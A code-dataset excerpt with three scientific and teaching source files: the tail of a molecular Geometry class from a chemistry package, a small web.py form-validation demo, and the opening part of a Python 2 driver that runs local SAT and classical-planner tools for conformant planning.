comment : str, optional
Will be written in the second line (comment line) of the
XYZ-string.
cart_coords : np.array, 1d, shape (3 * atoms.size, )
Cartesians for dumping instead of self._coords.
Returns
-------
xyz_str : str
Current geometry as string in XYZ-format.
"""
if cart_coords is None:
cart_coords = self._coords
cart_coords = cart_coords.copy()
cart_coords *= BOHR2ANG
if comment == "":
comment = self.comment
return make_xyz_str(self.atoms, cart_coords.reshape((-1, 3)), comment)
def dump_xyz(self, fn):
if not fn.lower().endswith(".xyz"):
fn = fn + ".xyz"
with open(fn, "w") as handle:
handle.write(self.as_xyz())
def get_subgeom(self, indices, coord_type="cart", sort=False):
"""Return a Geometry containing a subset of the current Geometry.
Parameters
----------
indices : iterable of ints
            Atomic indices that define the subset of the current Geometry.
coord_type : str, ("cart", "redund"), optional
Coordinate system of the new Geometry.
Returns
-------
sub_geom : Geometry
Subset of the current Geometry.
"""
if sort:
indices = sorted(indices)
ind_list = list(indices)
sub_atoms = [self.atoms[i] for i in ind_list]
sub_coords = self.coords3d[ind_list]
sub_geom = Geometry(sub_atoms, sub_coords.flatten(), coord_type=coord_type)
return sub_geom
def get_subgeom_without(self, indices, **kwargs):
with_indices = [ind for ind, _ in enumerate(self.atoms) if ind not in indices]
return self.get_subgeom(with_indices, **kwargs)
def rmsd(self, geom):
return rmsd.kabsch_rmsd(
self.coords3d - self.centroid, geom.coords3d - geom.centroid
)
def as_g98_list(self):
"""Returns data for fake Gaussian98 standard orientation output.
Returns
-------
g98_list : list
List with one row per atom. Every row contains [center number,
atomic number, atomic type (always 0 for now), X Y Z coordinates
            in Angstrom].
"""
Atom = namedtuple("Atom", "center_num atom_num atom_type x y z")
atoms = list()
for i, (a, c) in enumerate(zip(self.atoms, self.coords3d), 1):
x, y, z = c * BOHR2ANG
atom = Atom(i, ATOMIC_NUMBERS[a.lower()], 0, x, y, z)
atoms.append(atom)
return atoms
def jmol(self, cart_coords=None):
"""Show geometry in jmol."""
tmp_xyz = tempfile.NamedTemporaryFile(suffix=".xyz")
tmp_xyz.write(self.as_xyz(cart_coords=cart_coords).encode("utf-8"))
tmp_xyz.flush()
jmol_cmd = "jmol"
try:
subprocess.run([jmol_cmd, tmp_xyz.name])
except FileNotFoundError:
print(f"'{jmol_cmd}' seems not to be on your path!")
tmp_xyz.close()
def as_ase_atoms(self):
try:
import ase
except ImportError:
print("Please install the 'ase' package!")
return None
# ASE coordinates are in Angstrom
atoms = ase.Atoms(symbols=self.atoms, positions=self.coords3d * BOHR2ANG)
if self.calculator is not None:
from pysisyphus.calculators import FakeASE
ase_calc = FakeASE(self.calculator)
atoms.set_calculator(ase_calc)
return atoms
def get_restart_info(self):
# Geometry restart information
restart_info = {
"atoms": self.atoms,
"cart_coords": self.cart_coords.tolist(),
"coord_type": self.coord_type,
"comment": self.comment,
}
try:
typed_prims = self.internal.typed_prims
except AttributeError:
typed_prims = None
restart_info["typed_prims"] = typed_prims
# Calculator restart information
try:
calc_restart_info = self.calculator.get_restart_info()
except AttributeError:
calc_restart_info = dict()
restart_info["calc_info"] = calc_restart_info
return restart_info
def set_restart_info(self, restart_info):
assert self.atoms == restart_info["atoms"]
self.cart_coords = np.array(restart_info["cart_coords"], dtype=float)
try:
self.calculator.set_restart_info(restart_info["calc_info"])
except KeyError:
print("No calculator restart information found!")
except AttributeError:
print("Could not restart calculator, as no calculator is set!")
def get_sphere_radius(self, offset=4):
distances = pdist(self.coords3d)
radius = (distances.max() / 2) + offset
return radius
def without_hydrogens(self):
atoms_no_h, coords3d_no_h = zip(
*[
(atom, coords)
for atom, coords in zip(self.atoms, self.coords3d)
if atom.lower() != "h"
]
)
return Geometry(atoms_no_h, np.array(coords3d_no_h).flatten())
def describe(self):
return f"Geometry({self.sum_formula}, {len(self.atoms)} atoms)"
def approximate_radius(self):
"""Approximate molecule radius from the biggest atom distance along an axis."""
coords3d = self.coords3d - self.centroid[None, :]
mins = coords3d.min(axis=0)
maxs = coords3d.max(axis=0)
dists = maxs - mins
max_dist = dists.max()
return max_dist
def rotate(self, copy=False):
if copy:
geom = self.copy()
else:
geom = self
rot = Rotation.random()
geom.coords3d = rot.apply(geom.coords3d)
return geom
@property
    def bond_sets(self):
        # A property getter cannot receive extra arguments, so the
        # module-level BOND_FACTOR is used directly.
        bonds = find_bonds(
            self.atoms, self.coords3d, self.covalent_radii, bond_factor=BOND_FACTOR
        )
bond_sets = set([frozenset(b) for b in bonds])
return bond_sets
def __str__(self):
name = ""
if self.name:
name = f"{self.name}, "
return f"Geometry({name}{self.sum_formula})"
def __repr__(self):
return self.__str__()
|
eljost/pysisyphus
|
pysisyphus/Geometry.py
|
Python
|
gpl-3.0
| 45,861
|
[
"ASE",
"Jmol"
] |
9b62562645acf0a652defaf9b62c174b40b132a8a8a36a16b1f569956fd1fb5c
|
import web
from web import form
render = web.template.render('templates/')
urls = ('/', 'index')
app = web.application(urls, globals())
myform = form.Form(
form.Textbox("boe"),
form.Textbox("bax",
form.notnull,
form.regexp('\d+', 'Must be a digit'),
form.Validator('Must be more than 5', lambda x:int(x)>5)),
form.Textarea('moe'),
form.Checkbox('curly'),
form.Dropdown('french', ['mustard', 'fries', 'wine']))
class index:
def GET(self):
form = myform()
# make sure you create a copy of the form by calling it (line above)
# Otherwise changes will appear globally
return render.formtest(form)
def POST(self):
form = myform()
if not form.validates():
return render.formtest(form)
else:
# form.d.boe and form['boe'].value are equivalent ways of
# extracting the validated arguments from the form.
return "Grrreat success! boe: %s, bax: %s" % (form.d.boe, form['bax'].value)
if __name__=="__main__":
web.internalerror = web.debugerror
app.run()
|
ivanortegaalba/DAI_2014-2015
|
practica-webpy/form-exercise5.py
|
Python
|
gpl-2.0
| 1,112
|
[
"MOE"
] |
a3730d96b0bd95eaac84cebc8a215fb4799693763d18a905d1c2899b994cd46e
|
#! /usr/bin/env python2.5
# -*- coding: latin-1 -*-
# Copyright (C) 2006-2008 Universitat Pompeu Fabra
# Copyright (C) 2009 Universidad Simon Bolivar
#
# Permission is hereby granted to distribute this software for
# non-commercial research purposes, provided that this copyright
# notice is included with any such distribution.
#
# THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
# SOFTWARE IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU
# ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
#
# Elaborated by Hector Palacios, hlp@ldc.usb.ve, hectorpal@gmail.com
# Joint work with Hector Geffner.
# call it with the following bash environment:
# TRANSLATOR_HOME=<directory>
# ulimit -S -s 1024000 (very high stack size)
# ulimit -S -v MEMORYLIMIT_in_kb
import sys, os, signal, sets, errno
import re, datetime, subprocess, time, resource
import math
import shutil
import timeout, lug, shutil
import nondet2conf
import pddlsfromtar
init_wall_clock = time.time()
def usage():
print """
TRANSLATOR: a family of translation-based planners for Conformant problems.
Includes t0, based on classical planning.
usage: %s {option}* (<domain.pddl> <problem.pddl> | <bothFiles.{tar|tgz|tbz}>)
general options:
-l log prefix. Log files: <prefix>_<problem>.{log,stat,ipc5,time}.
Prefix default = translator_<strategy>
  -f force to overwrite previous log file, default = no
  -t global time limit. Overrides strategies
-c check plan, default = no
-d leave generated files for debug, default = no
-v l verbosity. default = %d, values = 0, 10, 20, 30
-s <strategy>
if a tar-file (ending in .tar, .tgz or .tbz) is used,
it should contain only two files: the domain and the problem.
<strategy> is an expression as follows.
    strategy ::= abbreviation:time{; strategy} | abbreviation:time
    abbreviation ::= t0 | only-t0 | k1 | only-k1
| s0 | fs0 | k0 | t0c | old-t0
| sat | mc | satplan
time ::= <int=time in seconds> | inf
(protect strategies from the shell by '' or "")
    Strategies are useful for combining different translation
    approaches. For example: sat + classical.
    For reasons of efficiency, classical translations
    are themselves strategies, as this avoids repeated parsing.
The default strategy is '%s'
Example: 'only-t0:inf; sat:inf'
    ABBREVIATIONS:
    ====== Translations to Classical Planning ======
Look for a conformant plan by transforming the problem into a classical one.
See Palacios & Geffner papers (ICAPS 2007 and JAIR 2009) for more details.
Most of the configurations try a series of classical problems
    with the FF classical planner (by default).
    If an instance is unsolvable, the next classical instance is tried.
==> t0
        1st: If width = 1, K1 with unique merge = satisfying clause,
else K1 with merges = all clauses
2nd: Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
==> only-t0
        If width = 1, K1 with unique merge = satisfying clause,
else K1 with merges = all clauses.
INCOMPLETE, polynomic.
==> k1
1st: K1 with merges = all clauses
2nd: Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
    ==> only-k1
K1 with merges = all clauses.
INCOMPLETE, polynomic.
==> s0
Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
    ==> fs0
Ktm with merge for each L, models of Initial situation.
COMPLETE, always exponential.
==> k0
No merges.
INCOMPLETE, polynomic.
==> t0c
like t0, but verify "consistency" of conformant problem.
==> old-t0
Used in IPC5 and IPC6
        1st: If width = 1, K1 with unique merge = satisfying clause
2nd: Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
==> kp (DISABLED)
AAAI-06 version. Not reimplemented yet.
For further options of translations to classical,
run ./cf2cs
To add a new option when calling cf2cs add '-trans -newoption'
while calling translator.
====== Logic-based Translations ======
Translate conformant problem into a CNF (a la SATPLAN)
==> sat
Look for an OPTIMAL conformant plan until a final horizon.
by transforming the problem to a SAT theory for each horizon
(As published in CAEPIA 2005, Palacios and Geffner, LNCS)
additional options for mc and sat:
-i n init horizon. default = %d
-e n final horizon. default = %d
-z look for serial plans instead of parallel. default = false.
-enum-s0 print all the possible initial states and exit.
-qbf create a .qdimacs for the qbf corresponding to the starting
horizon and finish. Use in combination with -i
==> mc
Look for an OPTIMAL conformant plan until a final horizon.
by transforming the problem to d-DNNF and doing MC on each node.
(As published in ICAPS 2005 Palacios, Bonet, Darwiche and Geffner)
addtional options for mc:
-nsim no simple prunning
-nstr no strong prunning
-lik most likely instead of select var/value by criticality (Huang ICAPS 2006)
Algorithm "mc" also works with probabilistic version.
On this case, for the init horizon (-i)
a plan with Maximal probability of success is reported.
==> satplan
A naive SATPLAN for classical planning.
    additional options:
-nsol N return N solutions to the problem. Useful for learning.
--------------------------------------------
In some cases is better to increase the stack size:
ulimit -S -s 1024000
and to limit the memory limit.
ulimit -S -v MEMORYLIMIT_IN_KB
    All tools are found in the $%s directory
This planner uses 'ff' as classical planner, 'siege_v4' and 'zChaff' as SAT solvers,
'relsat' as a model enumerator, 'verify' for verifying conformant plans,
'validate' for validating classical plans, 'c2d_220' for compiling into d-DNNF
or simplifying CNF theories.
Rights are registered by their respective owners.
Contact Hector Palacios for further information,
or visit http://www.ldc.usb.ve/~hlp
""" % (sys.argv[0], verbosity, sstrategy, init_horiz, end_horiz, Loc_v)
sys.exit(1)
def get_user_time(str):
""" For getting seconds from user field of time().
For example: 'user 1m3.183s'
"""
res = str
for it2 in str.split(' '):
if 'user' in it2:
for it in it2.split():
if 'm' in it:
[m,s] = it.split('m')
s = s.split('s')[0]
else:
m = '0'
s = it.split('u')[0]
try:
res = float(m)*60+float(s)
except:
pass
return res
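# Hedged example, assuming tab-separated bash `time` output (the string is
# first split on single spaces, so 'user' and the duration must share one
# token): get_user_time('user\t1m3.183s') returns 63.183.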
def weak_unlink(f):
try:
os.unlink(f)
except:
return
def gen_log(msg, lst = [], time = True, date = False):
msg2=msg + ' '
if(time and not date ):
msg2 += 'at ' + datetime.datetime.now().strftime('%H:%M:%S')
elif( date ):
msg2 += 'at ' + datetime.datetime.now().ctime()
line = ''
if(lst != []):
line = '\ncommand: '
for i in lst:
line += i + ' '
return msg2+line
def pr(msg):
print msg
log_f.write(msg+'\n')
log_f.flush()
def log(msg):
log_f.write(msg+'\n')
log_f.flush()
# Extracting from result of wait
def the_signal(result):
return result & 127
def was_core(result):
    return (result & 128) != 0
def exit_status(result):
return result >> 8
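# Layout sketch of the POSIX wait() status decoded above: the low 7 bits hold
# the terminating signal, bit 7 the core-dump flag and the high byte the exit
# status. E.g. the_signal(0x8B) == 11 with was_core(0x8B) True, and
# exit_status(0x0F00) == 15.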
tokill=[]
def clean_children():
for pid in tokill:
try:
os.kill(pid,15)
except OSError, e:
if e.errno == errno.ESRCH:
continue
time.sleep(0.5)
while 1:
try:
pid,res = os.waitpid(0, os.WNOHANG)
if(pid==0):
break
else:
print 'additional process found %d' % pid
os.kill(pid,15)
except OSError, e:
if e.errno == errno.ESRCH:
continue
elif e.errno == errno.ECHILD:
break
else:
raise
#print 'Collecting zombies...'
time.sleep(0.5)
while 1:
try:
pid,result = os.wait()
signal = the_signal(result)
core = was_core(result)
status=exit_status(result)
print '\tfinished pid =', pid, 'signal =', signal, 'core =', core, 'status =', status
except OSError, e:
if e.errno == errno.ESRCH:
continue
elif e.errno == errno.ECHILD:
break
else:
raise
def killall(signum, frame):
global cleaning_functions
if(signum==14):
print 'Timeout... trying to kill pending children'
else:
print 'Interrupted... trying to kill pending children'
print 'collecting zombies... done'
clean_children()
print 'cleaning files... done'
for x in cleaning_functions:
f = x[0]
arg = x[1]
f(arg)
finish()
stat_f.write('TIMEOUT\n')
sys.exit(1)
def calc_num_s0s(init_nf):
cmd=[Loc+'/relsat','-#c',init_nf]
log(gen_log('--------- Calling',cmd))
relsat=subprocess.Popen(cmd,bufsize=1000, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
num_s0 = -1
for l in relsat.stdout.readlines():
if(l.startswith('Number of solutions')):
num_s0 = int(l.split(' ')[3])
if(num_s0 <= 0):
pr('Error on response of relsat -#c')
sys.exit(1)
res = relsat.wait()
tokill.pop()
if(res < 0):
pr('Error calling relsat -#c: %d ' % res)
sys.exit(1)
return num_s0
atom2time = {}
def calc_atom2fluent(atoms_nf):
atom2fluent = {}
atoms_f=open(atoms_nf,'r')
for line in atoms_f.readlines():
if(line.find(':')> 0):
pair=line.split(':')
fluent=pair[1][0:-1].split('*')[0]
v_atom=pair[0].split(' ')[0]
t=pair[0].split(' ')[2]
atom=v_atom[1:len(v_atom)]
atom2fluent[atom] = fluent
atom2time[atom] = t
atoms_f.close()
return atom2fluent
def is_really_consistent(n_atoms_init, num_s0s, actions_nf, nnf_nf):
cmd=[Loc+'/plannf','-f',str(n_atoms_init),str(num_s0s),actions_nf,nnf_nf]
log(gen_log('--------- Calling', cmd))
    # When the nnf is just false or true, plannf violates an assertion;
    # the problem is not consistent anyway, so we redirect errors to /dev/null
devnull=open(os.devnull,'w')
plannf=subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE, stderr=devnull )
tokill.append(plannf.pid)
answ = False
for l in plannf.stdout.readlines():
if(l.startswith('RESULT')):
answ = l.split(':')[1].strip()
res = plannf.wait()
tokill.pop()
if(res < 0):
pr('Error calling plannf: %d ' % res)
sys.exit(1)
res = ""
devnull.close()
if(answ=='yes'):
return True
else:
return False
def is_consistent(n_atoms_init,init_nf,cnf_nf):
cnfs0_nf=init_nf+'.s0'
erase.add(cnfs0_nf)
cmd=[Loc+'/relsat',init_nf] # If we add -#a, check every solution
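    # For each initial-state model reported by relsat, fix it as unit clauses
    # in the full CNF and test satisfiability: if some initial state admits no
    # execution, there can be no conformant plan candidate at this horizon.
    # (Without the -#a flag only the first reported model is checked.)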
relsat=subprocess.Popen(cmd,bufsize=-1, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
sat=True
for l in relsat.stdout.readlines():
if(l.startswith('Solution')):
# From HERE
lines = ''
nlines = 0
models = set((l.split(':')[1].strip()).split(' '))
for a in range(1,n_atoms_init+1):
if(str(a) in models):
lines += ' '+str(a)+' 0\n'
else:
lines += ' -'+str(a)+' 0\n'
nlines += 1
# to HERE, better to use relsat2model
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
cnfs0_f=open(cnfs0_nf,'w')
cnfs0_f.write("p cnf %s %d\n" % (line[2], nlines+int(line[3])) )
cnfs0_f.write(lines)
for line in cnf_f.readlines():
cnfs0_f.write(line)
cnf_f.close()
cnfs0_f.close()
cmd2=[Loc+'/relsat',cnfs0_nf]
relsat2=subprocess.Popen(cmd2,bufsize=-1, stdout=subprocess.PIPE)
tokill.append(relsat2.pid)
for l in relsat2.stdout.readlines():
if(l.find('UNSAT') >= 0):
sat = False
break
res = relsat2.wait()
tokill.pop()
if(res < 0):
pr('Error calling relsat (2): %d' % res)
sys.exit(1)
if(not sat): break
    if(not sat):
        try:
            os.kill(relsat.pid,15)
        except OSError, e:
            if e.errno == errno.ESRCH:
                pass
            else:
                raise
    # wait for (and unregister) relsat in both the SAT and UNSAT cases
    relsat.wait()
    tokill.pop()
    return sat
def global_time():
return resource.getrusage(resource.RUSAGE_SELF)[0]+\
resource.getrusage(resource.RUSAGE_CHILDREN)[0]
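# lost_wall_clock(): wall-clock time not accounted for as user CPU time
# (e.g. time spent blocked on I/O or sleeping); used below to extend the
# per-translation time budgets.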
def lost_wall_clock():
return time.time() - init_wall_clock -\
global_time()
final_time = -1
global_total_time = 0
def finish():
if(statline != ''):
stat_f.write(statline+'\n')
if( final_time == -1 ):
rt = global_time()
else:
rt = final_time
if global_total_time == 0:
t = str(rt)
else:
t = str(global_total_time)
line = 'TOTAL_TIME:' + t
pr(line)
stat_f.write(line+'\n')
time_f = open(time_nf,'w')
time_f.write(t)
cleanfiles()
def cleanfiles():
for f in erase:
weak_unlink(f)
if(not do_debug):
for f in erasedebug:
weak_unlink(f)
def save_plan(plan,extra=''):
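    # Writes the IPC-5 plan format; e.g. for plan = ['(a)', '(b)'] the file is:
    #   0
    #   %%
    #   2 (a) (b)
    #   %%
    #   linear 2 0 1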
ipc5_f=open(ipc5_nf+extra,'w')
ipc5_f.write('0\n')
ipc5_f.write('%%\n')
ipc5_f.write(str(len(plan)))
for act in plan:
ipc5_f.write(' '+act)
ipc5_f.write('\n')
ipc5_f.write('%%\n')
ipc5_f.write('linear ')
ipc5_f.write(str(len(plan)))
for i in range(0,len(plan)):
ipc5_f.write(' '+str(i))
ipc5_f.write('\n')
ipc5_f.close()
def save_flat_plan(plan,nf):
f=open(nf,'w')
for act in plan:
f.write(act+'\n')
f.close()
go_on=False
def going_on(signum, frame):
global go_on
go_on=True
print 'Continuing.... because got signal',signum
signal.signal(signal.SIGUSR1, going_on)
go_on_others = False
def donothing(signum, frame):
#print 'Child finish',frame.f_code
global go_on_others
go_on_others = True
pass
# The current distribution of LAMA requires the PDDL files to be in
# the same directory as its executables.
# Point the LAMA environment variable at that directory.
def run_classical_lama(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical):
copy_to_path = False
try:
lama_dir=os.environ['LAMA']
except KeyError, e:
        pr('LAMA environment variable not set. Where is it?')
to_run_classical = False
return
if copy_to_path:
shutil.copy(ndomain_nf,lama_dir)
shutil.copy(nproblem_nf,lama_dir)
cur_dir = os.environ['PWD']
if copy_to_path:
os.chdir(lama_dir)
try:
os.remove('res.1')
except OSError:
pass
if copy_to_path:
cmd=['./plan',ndomain_nf,nproblem_nf,'res']
else:
cmd=[lama_dir+'/plan',ndomain_nf,nproblem_nf,'res']
pr(gen_log('Solving classical problem'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
log_nf_tmp2=log_nf+'-lama.tmp'
erasedebug.add(log_nf_tmp2)
erasedebug.add('res.1')
erase.add('output')
erase.add('output.sas')
erase.add('test.groups')
log_f_tmp2=open(log_nf_tmp2,'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
go_on_others = False
classical=subprocess.Popen(cmd, bufsize=-1, stdout=log_f_tmp2, stderr=log_f_tmp2)
tokill.append(classical.pid)
res = classical.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling classical: %d' % res)
to_run_classical = False
log_f_tmp2.close()
log_f_tmp2 = open(log_nf_tmp2,'r')
for l in log_f_tmp2.readlines():
log_f.write(l)
if 'std::bad_alloc' in l or 'MemoryError' in l:
to_run_classical = False
pr('solving classical problem: NO MEMORY')
log_f_tmp2.close()
full_plan=[]
for l in file('res.1'):
full_plan.append(l.strip().replace(' )',')'))
if copy_to_path:
shutil.move(log_nf_tmp2,cur_dir)
os.chdir(cur_dir)
return [full_plan,to_run_classical,elapsed]
def run_classical_ff(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical):
path=os.environ['PWD']+'/'
cmd=[Loc+'/ff','-p',path,'-o',ndomain_nf,'-f',nproblem_nf]
if False and is_nondet:
cmd.extend(['-h','1'])
pr(gen_log('Solving classical problem'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
log_nf_tmp2=log_nf+'-ff.tmp'
erasedebug.add(log_nf_tmp2)
log_f_tmp2=open(log_nf_tmp2,'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
go_on_others = False
classical=subprocess.Popen(cmd, bufsize=-1, stdout=log_f_tmp2, stderr=log_f_tmp2)
tokill.append(classical.pid)
res = classical.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling classical: %d' % res)
to_run_classical = False
log_f_tmp2.close()
exp = re.compile('[0-9]:',re.VERBOSE)
log_f_tmp2 = open(log_nf_tmp2,'r')
full_plan=[]
for l in log_f_tmp2.readlines():
log_f.write(l)
if exp.search(l):
act = '(' + l.split(':')[1].split()[0].strip() + ')'
full_plan.append(act)
if l.startswith('NO MEMORY'):
to_run_classical = False
pr('solving classical problem: NO MEMORY')
log_f_tmp2.close()
return [full_plan,to_run_classical,elapsed]
def run_classical(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical):
global classical_planner
"""
Should return [plan,full_plan,to_run_classical,elapsed]
where:
- plan: list of conformant actions, original arguments with obj/constants
- full_plan: list of classical actions (without merge, etc)
- to_run_classical: true if another run or another planner should be run
"""
if classical_planner.lower() == 'ff':
[full_plan,to_run_classical,elapsed] = run_classical_ff(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical)
elif classical_planner.lower() == 'lama':
[full_plan,to_run_classical,elapsed] = run_classical_lama(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical)
else:
pr('ERROR: classical planner neither FF or LAMA: %s' % classical_planner)
plan=[]
for a in full_plan:
au = a.upper()
if au.find('MERGE') < 0 and \
au.find('MAKE_END_DISJ_GOAL') < 0 and\
au.find('REACH-GOAL') < 0 and \
'----RESET' not in au:
act = a.replace('_',' ')
if is_nondet:
act_splitted = re.split('COPY----[0-9]+-',act)
                if len(act_splitted) != 1:
act = act_splitted[1]
plan.append(act)
return [plan,full_plan,to_run_classical,elapsed]
def cf2cs(exec_f,transf_type):
global statline, plan_found, erasedebug, erase, extra_options, go_on, global_total_time
pr('Starting cf2cs (%s): translating from conformant planning to classical planning' %
(transf_type+'. extra: '+str(extra_options)))
# Transform non-deterministic probs into deterministics
prefix_det='conf'
is_nondet = nondet2conf.nondet2conf(domain_nf, problem_nf, prefix_det)
tdomain_nf = prefix_det+'-d.pddl'
tproblem_nf = prefix_det+'-p.pddl'
erasedebug.add(tdomain_nf)
erasedebug.add(tproblem_nf)
if not is_nondet:
weak_unlink(tdomain_nf)
weak_unlink(tproblem_nf)
tdomain_nf = domain_nf
tproblem_nf = problem_nf
calc_models_cnf_f = '.init.cnf'
calc_models_sols_f = calc_models_cnf_f + '.sols'
erasedebug.add(calc_models_cnf_f)
erasedebug.add(calc_models_sols_f)
erasedebug.add('.c_i.cls')
erasedebug.add('.c_i.cls.pi')
erasedebug.add('.clauses.cnf')
erasedebug.add('.clauses.cnf.nnf')
erasedebug.add('output-c2d.log')
erasedebug.add('output-models.log')
# From conformant into classical
cmd=[Loc+'/'+exec_f]
if transf_type != '':
for i in transf_type.split(' '):
cmd.extend([i])
cmd.extend(extra_options)
prefix='new'
nproblem_nf = prefix+'-p.pddl'
ndomain_nf = prefix+'-d.pddl'
erasedebug.add(nproblem_nf)
erasedebug.add(ndomain_nf)
weak_unlink(nproblem_nf)
weak_unlink(ndomain_nf)
    cmd.append('-sp') # cf2cs notifies this process when it has finished generating the PDDLs
cmd.extend(['-s',prefix,tdomain_nf,tproblem_nf])
pr(gen_log('Generating PDDL for classical problem'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
log_nf_tmp=log_nf+'-cf2cs.tmp'
erasedebug.add(log_nf_tmp)
log_f_tmp=open(log_nf_tmp,'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
cf2cs=subprocess.Popen(cmd, bufsize=-1, stdout=log_f_tmp, stderr=log_f_tmp)
tokill.append(cf2cs.pid)
    # Iterate until a plan is found.
    # When a plan is found, signal cf2cs.pid so that it terminates cleanly;
    # when no plan is found, send another signal so that it generates new PDDLs.
to_run_classical = True
print "I'm",os.getpid(),'and cf2cs is',cf2cs.pid
while to_run_classical:
# Are the files there?
signal.signal(signal.SIGCHLD, donothing)
[gotpid,code] = os.waitpid(0,os.WNOHANG)
if gotpid == 0:
if not go_on:
print 'Pausing (waiting for new PDDL).'
if not go_on:
signal.pause()
else:
print 'Seems that process',gotpid,'already finished. Code:',code
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
#print 'Awake. Looking for files and running planner'
if not os.access(os.path.abspath(ndomain_nf),os.F_OK) or\
not os.access(os.path.abspath(nproblem_nf),os.F_OK):
pr('generation of new pddls, FAILED')
return
# Run classical planner
[plan,full_plan,to_run_classical,elapsed] = \
run_classical(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical)
if(plan == []):
pr('solving classical problem: FAILED')
stat_f.write('classical_planner_failed\n')
[gotpid,code] = os.waitpid(0,os.WNOHANG)
if gotpid == 0:
                # Try with other PDDLs
weak_unlink(nproblem_nf)
weak_unlink(ndomain_nf)
if to_run_classical:
go_on=False
pr('Generating a new PDDL')
os.kill(cf2cs.pid,signal.SIGUSR1)
else:
try:
os.kill(cf2cs.pid,signal.SIGUSR2)
except OSError:
pass
else:
pr('cf2cs finished. No plan found')
stat_f.write('cf2cs_finished\n')
to_run_classical = False
continue
pr(gen_log('solution FOUND'))
global_total_time += elapsed
stat_f.write('solving_time:'+str(elapsed)+'\n')
try:
os.kill(cf2cs.pid,signal.SIGUSR2)
except OSError:
pass
plan_found=True
to_run_classical = False
pr('Plan: ')
for act in plan:
pr(act)
msg = 'PLAN_LENGTH:' + str(len(plan)) +'\n'
pr(msg)
stat_f.write(msg)
pr('')
save_plan(plan)
if check_plan :
try:
# Check also classical plan
flat_plan_nf = prefix+'.plan'
erasedebug.add(flat_plan_nf)
save_flat_plan(full_plan,flat_plan_nf)
cmd=[Loc+'/validate','-v',ndomain_nf,nproblem_nf,flat_plan_nf]
log(gen_log('--------- Calling',cmd))
validate=subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE, stderr=log_f )
tokill.append(validate.pid)
isvalid = False
unknown_warning = False
output = ''
for l in validate.stdout.readlines():
output += l
if l.startswith('Plan valid'):
isvalid = True
elif 'WARNING' in l:
if 'adds the literal' not in l and 'deletes the literal' not in l:
unknown_warning = True
if unknown_warning:
isvalid = False
if not isvalid:
pr(output)
else:
pr('Valid classical plan')
statline += '\nCLASSICAL-OK:'
if(isvalid):
statline += 'YES'
else:
statline += 'NO'
res = validate.wait()
tokill.pop()
if(res < 0):
pr('Error calling validate: %d' % res)
except OSError, e:
                pr('failed calling the validator...')
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
try:
res = cf2cs.wait()
except OSError:
res = cf2cs.returncode
    if res is None: res = 0
if( res < 0 ):
pr('Error calling cf2cs: %d' % int(res) )
sys.exit(1)
if True or not plan_found:
log_f_tmp.close()
pi_time=0
for i in open(log_nf_tmp,'r'):
log_f.write(i)
if(i.find('FATAL ERROR') >= 0):
                stat_f.write('translation_failure\n')
plan_found = False
sys.exit(1)
if(i.startswith('STAT')):
s,var,value = i.split(' ')
stat_f.write(var+' '+value)
if(' Time elapsed in Prime implicates' in i):
pi_time=get_user_time(i.split(':')[1].strip())
if(i.startswith('REGISTER: main()')):
elapsed = float(i.split()[3])
elapsed = elapsed+pi_time
global_total_time += elapsed
stat_f.write('translation_time:'+str(elapsed)+'\n')
def relsat2model(l,n_atoms_init):
"""
l is a relsat all solutions line (with -#a option). For example:
Solution 5: 45 123 2 1 12
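    With n_atoms_init = 6 this returns [1, 2, -3, -4, -5, -6].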
"""
models = set((l.split(':')[1].strip()).split())
model=[]
for a in range(1,n_atoms_init+1):
if(str(a) in models):
model.append(int(a))
else:
model.append(-int(a))
#print 'MODEL',n_atoms_init,model
return model
def make_bits(num,num_bits,base):
"""
Return the binary encoding of num
using num_bits bits.
    Each bit is represented using a numeric variable (cnf sense)
starting from base+1
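    E.g. make_bits(5, 4, 10) returns ['-14', '13', '-12', '11'] (5 = 0101b).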
"""
l=[]
for b in range(0,num_bits):
#print 2**b, base, base+b+1
if num & (2**b) == 0:
l.append(str(-(base+b+1)))
else:
l.append(str(base+b+1))
l.reverse()
return l
# Print all the possible initial states
def do_enum_s0(n_atoms_init,atoms_nf,init_nf,printit=True):
atom2fluent = calc_atom2fluent(atoms_nf)
cmd=[Loc+'/relsat','-#a',init_nf]
relsat=subprocess.Popen(cmd,bufsize=1000, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
if printit:
print 'Models:'
else:
result=[]
for l in relsat.stdout.readlines():
if(l.startswith('Solution ')):
if printit:
print 'Solution: ',
for i in l.split(': ')[1].split():
atom = atom2fluent[i]
